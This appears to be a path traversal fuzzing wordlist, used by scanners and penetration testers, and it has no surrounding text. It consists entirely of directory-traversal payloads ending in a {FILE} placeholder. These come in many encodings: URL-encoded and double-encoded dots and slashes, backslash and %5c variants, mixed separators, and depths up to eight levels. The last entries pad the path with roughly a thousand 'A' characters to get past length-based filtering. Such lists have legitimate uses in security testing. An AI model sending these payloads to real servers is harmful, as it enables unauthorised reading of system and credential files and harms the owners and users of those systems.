-/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE} -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE} -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE} -/%2e%2e%2f{FILE} -/%2e%2e%2f%2e%2e%2f{FILE} -/%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -/..%252f{FILE} -/..%252f..%252f{FILE} -/..%252f..%252f..%252f{FILE} -/..%252f..%252f..%252f..%252f{FILE} -/..%252f..%252f..%252f..%252f..%252f{FILE} -/..%252f..%252f..%252f..%252f..%252f..%252f{FILE} -/..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE} -/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE} -/%252e%252e/{FILE} -/%252e%252e/%252e%252e/{FILE} -/%252e%252e/%252e%252e/%252e%252e/{FILE} -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE} -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE} -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE} -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE} -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE} -/%252e%252e%252f{FILE} -/%252e%252e%252f%252e%252e%252f{FILE} -/%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE} -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE} -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE} -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE} -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE} -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE} -/..\{FILE} -/..\..\{FILE} -/..\..\..\{FILE} -/..\..\..\..\{FILE} -/..\..\..\..\..\{FILE} -/..\..\..\..\..\..\{FILE} -/..\..\..\..\..\..\..\{FILE} -/..\..\..\..\..\..\..\..\{FILE} -/..%5c{FILE} -/..%5c..%5c{FILE} -/..%5c..%5c..%5c{FILE} -/..%5c..%5c..%5c..%5c{FILE} -/..%5c..%5c..%5c..%5c..%5c{FILE} -/..%5c..%5c..%5c..%5c..%5c..%5c{FILE} -/..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE} -/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE} -/%2e%2e\{FILE} -/%2e%2e\%2e%2e\{FILE} -/%2e%2e\%2e%2e\%2e%2e\{FILE} -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE} -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE} -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE} -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE} -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE} -/%2e%2e%5c{FILE} -/%2e%2e%5c%2e%2e%5c{FILE} -/%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -/..%255c{FILE} -/..%255c..%255c{FILE} -/..%255c..%255c..%255c{FILE} -/..%255c..%255c..%255c..%255c{FILE} -/..%255c..%255c..%255c..%255c..%255c{FILE} -/..%255c..%255c..%255c..%255c..%255c..%255c{FILE} -/..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE} -/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE} -/%252e%252e\{FILE} -/%252e%252e\%252e%252e\{FILE} -/%252e%252e\%252e%252e\%252e%252e\{FILE} -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE} -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE} -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE} -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE} -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE} -/%252e%252e%255c{FILE} -/%252e%252e%255c%252e%252e%255c{FILE} -/%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE} -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE} -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE} -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE} -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE} -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE} -/../{FILE} -/../../{FILE} -/../../../{FILE} -/../../../../{FILE} -/../../../../../{FILE} -/../../../../../../{FILE} -/../../../../../../../{FILE} -/../../../../../../../../{FILE} -/..%2f{FILE} -/..%2f..%2f{FILE} -/..%2f..%2f..%2f{FILE} -/..%2f..%2f..%2f..%2f{FILE} -/..%2f..%2f..%2f..%2f..%2f{FILE} -/..%2f..%2f..%2f..%2f..%2f..%2f{FILE} -/..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE} -/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE} -/%2e%2e/{FILE} -/%2e%2e/%2e%2e/{FILE} -/%2e%2e/%2e%2e/%2e%2e/{FILE} -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE} -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE} -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE} -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE} -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE} -/%2e%2e%2f{FILE} -/%2e%2e%2f%2e%2e%2f{FILE} -/%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -/..%252f{FILE} -/..%252f..%252f{FILE} -/..%252f..%252f..%252f{FILE} -/..%252f..%252f..%252f..%252f{FILE} -/..%252f..%252f..%252f..%252f..%252f{FILE} -/..%252f..%252f..%252f..%252f..%252f..%252f{FILE} -/..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE} -/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE} -/%252e%252e/{FILE} -/%252e%252e/%252e%252e/{FILE} -/%252e%252e/%252e%252e/%252e%252e/{FILE} -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE} -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE} -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE} -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE} -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE} -/%252e%252e%252f{FILE} -/%252e%252e%252f%252e%252e%252f{FILE} -/%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE} -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE} -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE} -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE} -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE} -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE} -/..\{FILE} -/..\..\{FILE} -/..\..\..\{FILE} -/..\..\..\..\{FILE} -/..\..\..\..\..\{FILE} -/..\..\..\..\..\..\{FILE} -/..\..\..\..\..\..\..\{FILE} -/..\..\..\..\..\..\..\..\{FILE} -/..%5c{FILE} -/..%5c..%5c{FILE} -/..%5c..%5c..%5c{FILE} -/..%5c..%5c..%5c..%5c{FILE} -/..%5c..%5c..%5c..%5c..%5c{FILE} -/..%5c..%5c..%5c..%5c..%5c..%5c{FILE} -/..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE} -/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE} -/%2e%2e\{FILE} -/%2e%2e\%2e%2e\{FILE} -/%2e%2e\%2e%2e\%2e%2e\{FILE} -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE} -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE} -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE} -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE} -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE} -/%2e%2e%5c{FILE} -/%2e%2e%5c%2e%2e%5c{FILE} -/%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -/..%255c{FILE} -/..%255c..%255c{FILE} -/..%255c..%255c..%255c{FILE} -/..%255c..%255c..%255c..%255c{FILE} -/..%255c..%255c..%255c..%255c..%255c{FILE} -/..%255c..%255c..%255c..%255c..%255c..%255c{FILE} -/..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE} -/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE} -/%252e%252e\{FILE} -/%252e%252e\%252e%252e\{FILE} -/%252e%252e\%252e%252e\%252e%252e\{FILE} -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE} -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE} -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE} -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE} -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE} -/%252e%252e%255c{FILE} -/%252e%252e%255c%252e%252e%255c{FILE} -/%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE} -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE} -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE} -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE} -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE} -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE} -/\../{FILE} -/\../\../{FILE} -/\../\../\../{FILE} -/\../\../\../\../{FILE} -/\../\../\../\../\../{FILE} -/\../\../\../\../\../\../{FILE} -/\../\../\../\../\../\../\../{FILE} -/\../\../\../\../\../\../\../\../{FILE} -//..\{FILE} -//..\/..\{FILE} -//..\/..\/..\{FILE} -//..\/..\/..\/..\{FILE} -//..\/..\/..\/..\/..\{FILE} -//..\/..\/..\/..\/..\/..\{FILE} -//..\/..\/..\/..\/..\/..\/..\{FILE} -//..\/..\/..\/..\/..\/..\/..\/..\{FILE} -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE} -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE} -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE} -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE} -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../{FILE} -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../{FILE} -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../{FILE} 